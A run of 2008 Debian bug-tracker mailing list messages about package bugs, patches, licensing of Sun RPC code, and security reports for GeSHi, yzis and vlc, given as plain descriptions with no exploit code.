Bug#494683: IfModule Apache2/Reload.pm is not working
Hi, I had to comment on /etc/apache2/conf.d/otrs2 with it, the module won't load. I don't known if it is a otrs2 bug or should go to another package. Thank you -- Javier Barroso Administrador de Sistemas Dirección Servicios Corporativos: TI [EMAIL PROTECTED] __ ISOTROL Edificio BLUENET. Avda. Isaac Newton, s/n, Isla de la Cartuja 41092 Sevilla. Tel.: 955 036 800 - Fax: 955 036 849 www.isotrol.com -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#500971: Bug fixed in version 1.40 Beta 1
Hi: It seems that this bug [1] and others [2], have been fixed in the new version 1.40 Beta 1 [3]: Greets and thanks for your work. [1]http://trac.transmissionbt.com/ticket/1305 [2]http://trac.transmissionbt.com/query?milestone=1.40&group=component&groupdesc=1&order=severity [3]http://www.transmissionbt.com/ -- +-- | Rafael Jesús Alcántara Pérez <[EMAIL PROTECTED]> | Director Técnico. | Teléfono fijo: 952 602 959 | Teléfono móvil: 661 673 272 | Fax: 952 602 959 | Dirección: C/ Afligidos 2, 3º Derecha, 29015 Málaga | Dédalo Ingenieros, S.L.: http://www.dedaloingenieros.com/ | PGP: http://pgp.rediris.es:11371/pks/lookup?op=index&search=0x53F330AB +- "For every complex problem there is a solution that is concise, clear, simple, and wrong." (H. L. Mencken) signature.asc Description: This is a digitally signed message part.
Bug#498505: mdadm: Bug still not fixed
On Monday November 3, [EMAIL PROTECTED] wrote: > Package: mdadm > Version: 2.6.7.1-1 > Followup-For: Bug #498505 > > > Problem still not fixed in 2.6.7.1-1. I start to reshape RAID5 array and > reboot machine. After that, mdadm --assemble causes segmentation fault. While > machine was powered off, some drives was moved to other SATA connectors and > devices in Linux was changed respectively (/dev/sdg was moved to /dev/sdd). This bug is fixed by commit 56f8add211a840faaed325bd16483b55da544e93 which is scheduled to be in 2.6.8, but was not included in 2.6.7.1. I include it below. NeilBrown >From 56f8add211a840faaed325bd16483b55da544e93 Mon Sep 17 00:00:00 2001 From: Neil Brown <[EMAIL PROTECTED]> Date: Thu, 19 Jun 2008 16:30:36 +1000 Subject: [PATCH] Fix an error when assembling arrays that are in the middle of a reshape. It is important that dup_super always returns an 'st' with the same ->ss and ->minor_version as the st that was passed. This wasn't happening for 0.91 metadata (i.e. in the middle of a reshape). --- super0.c |5 - 1 files changed, 4 insertions(+), 1 deletions(-) diff --git a/super0.c b/super0.c index 7e81482..8e4c568 100644 --- a/super0.c +++ b/super0.c @@ -849,12 +849,15 @@ static struct supertype *match_metadata_desc0(char *arg) st->sb = NULL; if (strcmp(arg, "0") == 0 || strcmp(arg, "0.90") == 0 || - strcmp(arg, "0.91") == 0 || strcmp(arg, "default") == 0 || strcmp(arg, "") == 0 /* no metadata */ ) return st; + st->minor_version = 91; /* reshape in progress */ + if (strcmp(arg, "0.91") == 0) /* For dup_super support */ + return st; + st->minor_version = 9; /* flag for 'byte-swapped' */ if (strcmp(arg, "0.swap")==0 || strcmp(arg, "0.9") == 0) /* For dup_super support */ -- 1.5.6.5 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504682: SA32559: GeSHi Unspecified Code Execution Vulnerability
Package: dokuwiki Severity: grave Version: 0.0.20061106-6 Tags: security Hi, The following SA (Secunia Advisory) id was published for GeSHi, which affects the embedded copy in dokuwiki[0]. SA32559[1]: > A vulnerability has been reported in GeSHI, which can potentially be > exploited by malicious people to compromise a vulnerable system. > > The vulnerability is caused due to an unspecified error, which may allow > execution of arbitrary code on an affected system. > > The vulnerability is reported in versions prior to 1.0.8.1. It would be great if dokuwiki just depended on php-geshi (also available in etch) and the include/require calls changed to use the copy provided by that package, to avoid shipping yet another embedded code copy. If you fix the vulnerability please also make sure to include the SA id in the changelog entry. [0]usr/share/dokuwiki/inc/geshi.php [1]http://secunia.com/Advisories/32559/ Cheers, -- Raphael Geissert - Debian Maintainer www.debian.org - get.debian.net signature.asc Description: This is a digitally signed message part.
Bug#504680: yzis: symlink attack vulnerability
Source: yzis Source-Version: 1.0~alpha1-1 Severity: serious Tags: security Hi, This source (affecting all frontends) is vulnerable to a symlink attack. The frontends (I guess the library might be doing this as it's the same behaviour in all cases) writes to «/tmp/yzisdebug-$USER.log». If we create a symlink pointing to some non-existent file, the frontend will create it with zero length on startup but segfault immediately. On the other hand if the symlink points to an existent file the frontends will just remove the current symlink and create a new file ignoring the pointed file. So at least this can be used to create zero length files on behalf of the user running the program. The best fix would be to not write that debug log file at all. regards, guillem -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504681: SA32559: GeSHi Unspecified Code Execution Vulnerability
Package: pgfouine Severity: grave Version: 0.7-1 Tags: security Hi, The following SA (Secunia Advisory) id was published for GeSHi, which affects the embedded copy in pgfouine[0]. SA32559[1]: > A vulnerability has been reported in GeSHI, which can potentially be > exploited by malicious people to compromise a vulnerable system. > > The vulnerability is caused due to an unspecified error, which may allow > execution of arbitrary code on an affected system. > > The vulnerability is reported in versions prior to 1.0.8.1. It would be great if pgfouine just depended on php-geshi (also available in etch) and the include/require calls changed to use the copy provided by that package, to avoid shipping yet another embedded code copy. If you fix the vulnerability please also make sure to include the SA id in the changelog entry. [0]usr/share/pgfouine/include/reporting/geshi/geshi.php [1]http://secunia.com/Advisories/32559/ Cheers, -- Raphael Geissert - Debian Maintainer www.debian.org - get.debian.net signature.asc Description: This is a digitally signed message part.
Bug#504604: Could not reproduce
To simplify this, I think you are saying that in v2.4, you see that a formula like this =if(A1-B1<>0;1;C1) returns an error 529 when C1 contains "" and A1 and B1 are empty I made a simplied test case in OOo 2.4 (the lenny version) The formula behaves the same in 2.4 and 3.0. My 3.0 is the experiemental version. In both cases, the formula evaluates to "" I think you are trying to report this: https://bugs.launchpad.net/openoffice/+bug/210153 but if I am correct, it would mean that while you think you have empty cells in T10 and Z10, you don't. So I don't understand your report. bug504604_1.ods Description: application/vnd.oasis.opendocument.spreadsheet
Bug#504604: Could not reproduce
To simplify this, I think you are saying that in v2.4, you see that a formula like this =if(A1-B1<>0;1;C1) returns an error 529 when C1 contains "" and A1 and B1 are empty I made a simplied test case in OOo 2.4 (the lenny version) The formula behaves the same in 2.4 and 3.0. My 3.0 is the experiemental version. In both cases, the formula evaluates to "" I think you are trying to report this: bug504604_1.ods Description: application/vnd.oasis.opendocument.spreadsheet
Bug#504373: Template Toolkit, Template::DBI and Etch updates breakage
> On Wed, Nov 05, 2008 at 12:03:14PM +, Dominic Hargreaves wrote: > > ftpmaster, I've just uploaded libtemplate-plugin-dbi-perl to NEW in > > order to fix an RC bug in libtemplate-perl (this is a regression from > > the functionality in etch; the code is in the main libtemplate-perl > > package in etch). > > > > Please could you process this as a lenny-related priority? > > Further to this, attached is my proposed NMU diff once > libtemplate-plugin-dbi-perl is available. Notice I've moved some other > packages from Suggests to Recommend on the advice of > > http://lists.debian.org/debian-release/2008/07/msg00828.html Thanks for handling this Dominic. Later, Mako -- Benjamin Mako Hill [EMAIL PROTECTED] http://mako.cc/ Creativity can be a social contribution, but only in so far as society is free to use the results. --GNU Manifesto signature.asc Description: Digital signature
Bug#504657: (no subject)
I will take care of this later tonight. -- _ Ryan Niebur [EMAIL PROTECTED] signature.asc Description: Digital signature
Processed: your mail
Processing commands for [EMAIL PROTECTED]: > found 504657 1.2-4 Bug#504657: gstm: implicit pointer conversions Bug marked as found in version 1.2-4. > -- Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504661: [pkg-nvidia-devel] Bug#504661: nvidia-glx-legacy-96xx-dev: /usr/lib/libGL.so symlink broken
> > % chase /usr/lib/libGL.so > chase: /usr/lib/libGL.so.100.14.19: No such file or directory > so your /usr/lib/GL.so is pointing to /usr/lib/libGL.so.100.14.19 ??? Maybe the symlink remained from a previous install and didn't get overwritten. The init script must not check. > Also, how come it's the nvidia-glx-legacy-96xx package that diverts > libGL.so, not this one? > Because people use libgl1-mesa-dev to compile against Mesa. > > > ___ > Pkg-nvidia-devel mailing list > [EMAIL PROTECTED] > http://lists.alioth.debian.org/mailman/listinfo/pkg-nvidia-devel -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504639: marked as done (vlc: buffer overflow in CUE support)
Your message dated Thu, 06 Nov 2008 00:02:09 + with message-id <[EMAIL PROTECTED]> and subject line Bug#504639: fixed in vlc 0.8.6.h-5 has caused the Debian Bug report #504639, regarding vlc: buffer overflow in CUE support to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 504639: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504639 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems --- Begin Message --- Package: vlc-nox Version: 0.8.6.h-4.1 Severity: grave Tags: security Justification: user security hole Hello, When parsing the header of an invalid CUE image file or an invalid RealText subtitle file, stack-based buffer overflows might occur: http://www.videolan.org/security/sa0810.html (I believe the RealText problem only affects experimental) Regargs. -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (100, 'unstable'), (100, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.27.4 (SMP w/2 CPU cores) Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages vlc-nox depends on: ii liba52-0.7.4 0.7.4-11 library for decoding ATSC A/52 str ii libasound2 1.0.16-2 ALSA library ii libavahi-client3 0.6.23-2 Avahi client library ii libavahi-common3 0.6.23-2 Avahi common library ii libavc1394-0 0.5.3-1+b1control IEEE 1394 audio/video devi ii libavcodec51 0.svn20080206-14 ffmpeg codec library ii libavformat52 0.svn20080206-14 ffmpeg file format library ii libavutil490.svn20080206-14 ffmpeg utility library ii libc6 2.7-15GNU C Library: Shared libraries ii libcdio7 0.78.2+dfsg1-3library to read and control CD-ROM ii libdbus-1-31.2.1-4 simple interprocess messaging syst ii libdvbpsi4 0.1.5-3.1 library for MPEG TS and DVB PSI ta ii libdvdnav4 4.1.2-3 DVD navigation library ii libdvdread30.9.7-11 library for reading DVDs ii libebml0 0.7.7-3.1 access library for the EBML format ii libfaad0 2.6.1-3.1 freeware Advanced Audio Decoder - ii libflac8 1.2.1-1.2 Free Lossless Audio Codec - runtim ii libfreetype6 2.3.7-2 FreeType 2 font engine, shared lib ii libfribidi00.10.9-1 Free Implementation of the Unicode ii libgcc11:4.3.2-1 GCC support library ii libgcrypt111.4.1-1 LGPL Crypto library - runtime libr ii libgnutls262.4.2-1 the GNU TLS library - runtime libr ii libhal10.5.11-6 Hardware Abstraction Layer - share ii libid3tag0 0.15.1b-10ID3 tag reading library from the M ii libiso9660-5 0.78.2+dfsg1-3library to work with ISO9660 files ii liblircclient0 0.8.3-3 infra-red remote control support - ii libmad00.15.1b-3 MPEG audio decoder library ii libmatroska0 0.8.1-1.1 extensible open standard audio/vid ii libmodplug0c2 1:0.8.4-2 shared libraries for mod music bas ii libmpcdec3 1.2.2-1 Musepack (MPC) format library ii libmpeg2-4 0.4.1-3 MPEG1 and MPEG2 video decoder libr ii libncurses55.6+20081025-1shared libraries for terminal hand ii libogg01.1.3-4 Ogg Bitstream Library ii libpng12-0 1.2.27-2 PNG library - runtime ii libpostproc51 0.svn20080206-14 ffmpeg video postprocessing librar ii libraw1394-8 1.3.0-4 library for direct access to IEEE ii libsmbclient 2:3.2.4-1 shared library that allows applica ii libspeex1 1.2~rc1-1 The Speex codec runtime library ii libstdc++6 4.3.2-1 The GNU Standard C++ Library v3 ii libsysfs2 2.1.0-5 interface library to sysfs ii libtheora0 1.0~beta3-1 The Theora Video Compression Codec ii libtwolame00.3.12-1 MPEG Audio Layer 2 encoding librar ii libvcdinfo00.7.23-4 library to extract information fro ii libvlc00.8.6.h-4.1 multimedia player and streamer lib ii libvorbis0a1.2.0.dfsg-3.1The Vorbis General Audio Compressi ii libvorbisenc2 1.2.0.dfsg-3.1The Vorbis General A
Bug#504639: marked as done (vlc: buffer overflow in CUE support)
Your message dated Thu, 06 Nov 2008 00:02:05 + with message-id <[EMAIL PROTECTED]> and subject line Bug#504639: fixed in vlc 0.8.6.h-4+lenny2 has caused the Debian Bug report #504639, regarding vlc: buffer overflow in CUE support to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 504639: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504639 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems --- Begin Message --- Package: vlc-nox Version: 0.8.6.h-4.1 Severity: grave Tags: security Justification: user security hole Hello, When parsing the header of an invalid CUE image file or an invalid RealText subtitle file, stack-based buffer overflows might occur: http://www.videolan.org/security/sa0810.html (I believe the RealText problem only affects experimental) Regargs. -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (100, 'unstable'), (100, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.27.4 (SMP w/2 CPU cores) Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages vlc-nox depends on: ii liba52-0.7.4 0.7.4-11 library for decoding ATSC A/52 str ii libasound2 1.0.16-2 ALSA library ii libavahi-client3 0.6.23-2 Avahi client library ii libavahi-common3 0.6.23-2 Avahi common library ii libavc1394-0 0.5.3-1+b1control IEEE 1394 audio/video devi ii libavcodec51 0.svn20080206-14 ffmpeg codec library ii libavformat52 0.svn20080206-14 ffmpeg file format library ii libavutil490.svn20080206-14 ffmpeg utility library ii libc6 2.7-15GNU C Library: Shared libraries ii libcdio7 0.78.2+dfsg1-3library to read and control CD-ROM ii libdbus-1-31.2.1-4 simple interprocess messaging syst ii libdvbpsi4 0.1.5-3.1 library for MPEG TS and DVB PSI ta ii libdvdnav4 4.1.2-3 DVD navigation library ii libdvdread30.9.7-11 library for reading DVDs ii libebml0 0.7.7-3.1 access library for the EBML format ii libfaad0 2.6.1-3.1 freeware Advanced Audio Decoder - ii libflac8 1.2.1-1.2 Free Lossless Audio Codec - runtim ii libfreetype6 2.3.7-2 FreeType 2 font engine, shared lib ii libfribidi00.10.9-1 Free Implementation of the Unicode ii libgcc11:4.3.2-1 GCC support library ii libgcrypt111.4.1-1 LGPL Crypto library - runtime libr ii libgnutls262.4.2-1 the GNU TLS library - runtime libr ii libhal10.5.11-6 Hardware Abstraction Layer - share ii libid3tag0 0.15.1b-10ID3 tag reading library from the M ii libiso9660-5 0.78.2+dfsg1-3library to work with ISO9660 files ii liblircclient0 0.8.3-3 infra-red remote control support - ii libmad00.15.1b-3 MPEG audio decoder library ii libmatroska0 0.8.1-1.1 extensible open standard audio/vid ii libmodplug0c2 1:0.8.4-2 shared libraries for mod music bas ii libmpcdec3 1.2.2-1 Musepack (MPC) format library ii libmpeg2-4 0.4.1-3 MPEG1 and MPEG2 video decoder libr ii libncurses55.6+20081025-1shared libraries for terminal hand ii libogg01.1.3-4 Ogg Bitstream Library ii libpng12-0 1.2.27-2 PNG library - runtime ii libpostproc51 0.svn20080206-14 ffmpeg video postprocessing librar ii libraw1394-8 1.3.0-4 library for direct access to IEEE ii libsmbclient 2:3.2.4-1 shared library that allows applica ii libspeex1 1.2~rc1-1 The Speex codec runtime library ii libstdc++6 4.3.2-1 The GNU Standard C++ Library v3 ii libsysfs2 2.1.0-5 interface library to sysfs ii libtheora0 1.0~beta3-1 The Theora Video Compression Codec ii libtwolame00.3.12-1 MPEG Audio Layer 2 encoding librar ii libvcdinfo00.7.23-4 library to extract information fro ii libvlc00.8.6.h-4.1 multimedia player and streamer lib ii libvorbis0a1.2.0.dfsg-3.1The Vorbis General Audio Compressi ii libvorbisenc2 1.2.0.dfsg-3.1The Vorbis Ge
Bug#382175: Sun RPC libraries and other stories
- "Michael Banck" <[EMAIL PROTECTED]> wrote: > The code is copyrighted by Sun, not some particular employee, so AFAICT > digging up who wrote it will not be necessary. Please understand that asking Sun to relicense source is a little like asking Debian to hurry up and release Lenny. Different pieces of source are controlled by various people who work in various departments in Sun. You can't just walk up to the "universal source control desk" and say "please relicense this". Their internal versions that their lawyers are used to dealing with are almost certainly not the same things that we are using. The main thing is, good news, they want to help! > This is portmap-6.0, from http://neil.brown.name/portmap/ > http://sourceware.org/cgi-bin/cvsweb.cgi/libc/sunrpc/?cvsroot=glibc > it would be desirable if Sun would relicense the past versions as well, > as Lenny will ship with glibc-2.7. The tarballs can be found at > ftp://sources.redhat.com/pub/glibc/ These look good, Simon has already read the email and forwarded these links along to some Sun legal people. -- Ean Schuessler, CTO Brainfood.com [EMAIL PROTECTED] - http://www.brainfood.com - 214-720-0700 x 315 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#382175: Sun RPC libraries and other stories
On Wed, Nov 05, 2008 at 05:07:07PM -0600, Ean Schuessler wrote: > > Assuming Sun is the sole copyright holder of that code, he could advise > > their IP laywers/whoever to relicense the code; either to the glibc > > license (LGPL-1.2 or later, currently), or perhaps the BSD license. The > > latter would probably be best for portmap as well, considering is is BSD > > licensed. > > > > If Sun does not want to relicense to BSD/LGPL this code due to their > > corporate licensing strategy, but still want to see the code remain in > > Debian's glibc/portmap, they should propose a compatible license they > > like I'd say. > > For Sun to make this happen we just have to help them line things up. > On the one hand, similar code exists in Solaris but we don't want to > go through the headache of trying to reintegrate that code into our > stack. We need to wave a magic licensing wand over the particular code > that we are using, in place. Since this code is from 1984 we have to > go through some archeological processes to locate the people in Sun > that are the duly designated authorities. The code is copyrighted by Sun, not some particular employee, so AFAICT digging up who wrote it will not be necessary. For portmap: - from_local.c: /* * Check if an address belongs to the local system. Adapted from: * * pmap_svc.c 1.32 91/03/11 Copyright 1984,1990 Sun Microsystems, Inc. * get_myaddress.c 2.1 88/07/29 4.0 RPCSRC. */ - portmap.c /* @(#)portmap.c 2.3 88/08/11 4.0 RPCSRC static char sccsid[] = "@(#)portmap.c 1.32 87/08/06 Copyr 1984 Sun Micro"; */ This is portmap-6.0, from http://neil.brown.name/portmap/ For glibc, it is basically everything in glibc/sunrpc, which got taken from rpcsrc-4.0 according to the top-level LICENSING file: "The Sun RPC support (from rpcsrc-4.0) is covered by the following license: [...]" The trunk code can be viewed at http://sourceware.org/cgi-bin/cvsweb.cgi/libc/sunrpc/?cvsroot=glibc but it would be desirable if Sun would relicense the past versions as well, as Lenny will ship with glibc-2.7. The tarballs can be found at ftp://sources.redhat.com/pub/glibc/ > What we need to do for them is provide them a list of URLs to the > elements we need re-licensed and the license we think would solve the > most problems for us. Sun can then take that source and start tracking > down who needs to authorize it. Hope that help, Michael -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504661: nvidia-glx-legacy-96xx-dev: /usr/lib/libGL.so symlink broken
Package: nvidia-glx-legacy-96xx-dev Version: 96.43.07-2 Severity: grave % chase /usr/lib/libGL.so chase: /usr/lib/libGL.so.100.14.19: No such file or directory % dpkg -L nvidia-glx-legacy-96xx | grep 'libGL\.' /usr/lib/libGL.so.96.43.07 /usr/lib/libGL.so.1 Also, how come it's the nvidia-glx-legacy-96xx package that diverts libGL.so, not this one? -- System Information: Debian Release: lenny/sid APT prefers testing APT policy: (990, 'testing'), (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.22-2-686 (SMP w/1 CPU core) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages nvidia-glx-legacy-96xx-dev depends on: ii nvidia-glx-legacy-96xx96.43.07-2 NVIDIA binary Xorg driver (96xx le nvidia-glx-legacy-96xx-dev recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504659: tasksel: Gnome pushes File and DNS server and language tasks off CD1
Package: tasksel Version: 2.76 Severity: serious Justification: Unsuitable for release While testing a Lenny RC2 preview CD in a "CD1 only, no mirror" installation, I noticed that the File server and DNS server tasks were missing from the list of available tasks during pkgsel. This also means that the CD contains no language tasks at all. It looks like the main reason for this is the recent changes in the gnome-desktop task, which changed its "key" package to 'gnome' from 'gnome-desktop-environment'. Result of this change is that Gnome takes up ~60MB more on CD1 than it used to and thus pushes off other tasks. This can be easily seen by running 'aptitude -R' on a clean system (the difference in the last column is what's relevant here): installed size download size gnome-desktop-environment 787MB 304MB gnome 959MB 368MB IMO this regression in the contents of CD1 should be fixed for Lenny. The only way to do this is to change back to 'gnome-desktop-environment' as "key" package for the gnome-desktop task and make 'gnome' a regular package in the task. This will NOT change the installation of Gnome in any way if a mirror is available or if multiple CDs or a DVD are used. But it will result in CD1 being more generally usable again for installations where that CD is the only available source. Even with that change it still seems to me that Gnome claims too much space on CD1. The gnome-d-e task depends on a number of packages that, although important for a good desktop experience, are not so essential that they need to be on CD1. And I would even say that VNC or webcam support, a VoIP client, or even a CD burner are "required" for a desktop system as users may just not have the hardware or be interested in that functionality. I would therefore suggest to change the following packages from Depends to Recommends in gnome-d-e: - gnome-user-guide (16MB download size!) - vinagre - vino - ekiga - cheese - nautilus-cd-burner Total savings from this suggested list for CD1: 36MB. Possibly some other packages from gnome-d-e's current dependencies could be added to this list. Having them as Recommends would mean they will still get installed if users install gnome-d-e manually and adds flexibility as users will gain the option to have gnome-d-e installed without those packages if they don't need them. To ensure the packages still get installed during a desktop installation using D-I there are two options: - adding them as Depends in the 'gnome' meta-package (preferred IMO) - listing them separately as non-key packages in the gnome-desktop task The main benefit of this reduction will be better international support on CD1 as there will be much more space available for "key" packages from language tasks. Cheers, FJP -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.27.4 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages tasksel depends on: ii aptitude 0.4.11.10-1lenny1.1 terminal-based package manager ii debconf [debconf-2.0 1.5.24 Debian configuration management sy ii liblocale-gettext-pe 1.05-4 Using libc functions for internati ii tasksel-data 2.76Official tasks used for installati tasksel recommends no packages. tasksel suggests no packages. -- debconf information excluded -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#382175: Sun RPC libraries and other stories
- "Michael Banck" <[EMAIL PROTECTED]> wrote: > Assuming Sun is the sole copyright holder of that code, he could advise > their IP laywers/whoever to relicense the code; either to the glibc > license (LGPL-1.2 or later, currently), or perhaps the BSD license. The > latter would probably be best for portmap as well, considering is is BSD > licensed. > > If Sun does not want to relicense to BSD/LGPL this code due to their > corporate licensing strategy, but still want to see the code remain in > Debian's glibc/portmap, they should propose a compatible license they > like I'd say. For Sun to make this happen we just have to help them line things up. On the one hand, similar code exists in Solaris but we don't want to go through the headache of trying to reintegrate that code into our stack. We need to wave a magic licensing wand over the particular code that we are using, in place. Since this code is from 1984 we have to go through some archeological processes to locate the people in Sun that are the duly designated authorities. What we need to do for them is provide them a list of URLs to the elements we need re-licensed and the license we think would solve the most problems for us. Sun can then take that source and start tracking down who needs to authorize it. > Thanks for working on this, let's hope we can resolve this in time for > Lenny! No problem. I'm here so I might as well do something useful! -- Ean Schuessler, CTO Brainfood.com [EMAIL PROTECTED] - http://www.brainfood.com - 214-720-0700 x 315 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#504657: gstm: implicit pointer conversions
Package: gstm Version: 1.2-5 Severity: serious Tags: patch Usertags: implicit-pointer-conversions Our automated buildd log filter[1] detected a problem that is likely to cause your package to segfault on architectures where the size of a pointer is greater than the size of an integer, such as ia64 and amd64. Function `gstm_name2filename' implicitly converted to pointer at callbacks.c:466 Function `create_pixbuf' implicitly converted to pointer at notarea.c:93 This is often due to a missing function prototype definition. For more information, see [2]. Though it is guaranteed that this codepath will cause a segfault on certain architectures, it is not guaranteed that this codepath would ever be executed (e.g., if the returned pointer is never dereferenced). However, this bug does prevent the ia64 buildd from successfully building this package, resulting in a practical FTBFS issue and warranting the serious severity. [1] http://people.debian.org/~dannf/check-implicit-pointer-functions [2] http://wiki.debian.org/ImplicitPointerConversions diff -urpN gstm-1.2.orig/src/callbacks.c gstm-1.2/src/callbacks.c --- gstm-1.2.orig/src/callbacks.c 2006-08-03 02:39:51.0 -0600 +++ gstm-1.2/src/callbacks.c 2008-11-05 15:47:34.0 -0700 @@ -13,6 +13,7 @@ #include "conffile.h" extern void gstm_quit(void); +extern char *gstm_name2filename(char *n); extern void docklet_x11_create(void); extern void docklet_x11_position_menu(GtkMenu *menu, int *x, int *y, gboolean *push_in, gpointer user_data); diff -urpN gstm-1.2.orig/src/notarea.c gstm-1.2/src/notarea.c --- gstm-1.2.orig/src/notarea.c 2006-08-02 06:43:50.0 -0600 +++ gstm-1.2/src/notarea.c 2008-11-05 15:50:42.0 -0700 @@ -34,6 +34,8 @@ #include "eggtrayicon.h" EggTrayIcon *docklet = NULL; static GtkWidget *image = NULL; +extern GdkPixbuf *create_pixbuf(const gchar *filename); + extern void docklet_clicked(int); static void docklet_x11_destroyed_cb(GtkWidget *widget, void *data);
Bug#504656: xserver-xorg-input-synaptics: Stops working after logoff
Package: xserver-xorg-input-synaptics
Version: 0.14.7~git20070706-4~dmitrmax.1
Severity: grave
Tags: patch
Justification: renders package unusable
Driver forgets to ungrab the event device so the next time it is grabbed EBUSY
is returned.
This happens e.g. when I logoff from KDE session and return to KDM screen. Only
restarting
the X server helps.
Bellow patch that fixes the problem.
-- System Information:
Debian Release: lenny/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.26-1-686 (SMP w/2 CPU cores)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages xserver-xorg-input-synaptics depends on:
ii libc6 2.7-15 GNU C Library: Shared libraries
ii libx11-6 2:1.1.5-2 X11 client-side library
ii libxext6 2:1.0.4-1 X11 miscellaneous extension librar
ii libxi62:1.1.3-1 X11 Input extension library
ii xserver-xorg-core 2:1.4.2-7 Xorg X server - core server
xserver-xorg-input-synaptics recommends no packages.
Versions of packages xserver-xorg-input-synaptics suggests:
pn gsynaptics | ksynaptics | qsy (no description available)
-- no debconf information
-- System Information:
Debian Release: lenny/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.26-1-686 (SMP w/2 CPU cores)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages xserver-xorg-input-synaptics depends on:
ii libc6 2.7-15 GNU C Library: Shared libraries
ii libx11-6 2:1.1.5-2 X11 client-side library
ii libxext6 2:1.0.4-1 X11 miscellaneous extension librar
ii libxi62:1.1.3-1 X11 Input extension library
ii xserver-xorg-core 2:1.4.2-7 Xorg X server - core server
xserver-xorg-input-synaptics recommends no packages.
Versions of packages xserver-xorg-input-synaptics suggests:
pn gsynaptics | ksynaptics | qsy (no description available)
-- no debconf information
--- xfree86-driver-synaptics-0.14.7~git20070706.orig/eventcomm.c
+++ xfree86-driver-synaptics-0.14.7~git20070706/eventcomm.c
@@ -58,6 +58,16 @@
static void
EventDeviceOffHook(LocalDevicePtr local)
{
+SynapticsPrivate *priv = (SynapticsPrivate *) (local->private);
+
+if (priv->synpara->grab_event_device) {
+ int ret;
+ SYSCALL(ret = ioctl(local->fd, EVIOCGRAB, (pointer)0));
+ if (ret < 0) {
+ xf86Msg(X_WARNING, "%s can't ungrab event device, errno=%d\n",
+ local->name, errno);
+ }
+}
}
static void
Bug#504167: linux-2.6 - regression: fails to unblank on resume
So i can resume with vanilla 2.6.26.5 and 2.6.27.4, but can't resume with 2.6.26.6. With 2.6.27.4 there is a small delay (about 3s) after resume and switch to X (screensaver), when keyboard and touchpad is not active. There is no delay with 2.6.26.5. And as a bonus, i can't change CPU frequency with debian kernel 2.6.26-9 and vanilla 2.6.26.6. Vanilla 2.6.26.5, 2.6.27.4 and Debian 2.6.26-8 are ok. Should i open another bugreport? J. smime.p7s Description: S/MIME Cryptographic Signature
Bug#503118: marked as done (vlc: CVE-2008-4686 integer overflow in ty parsing)
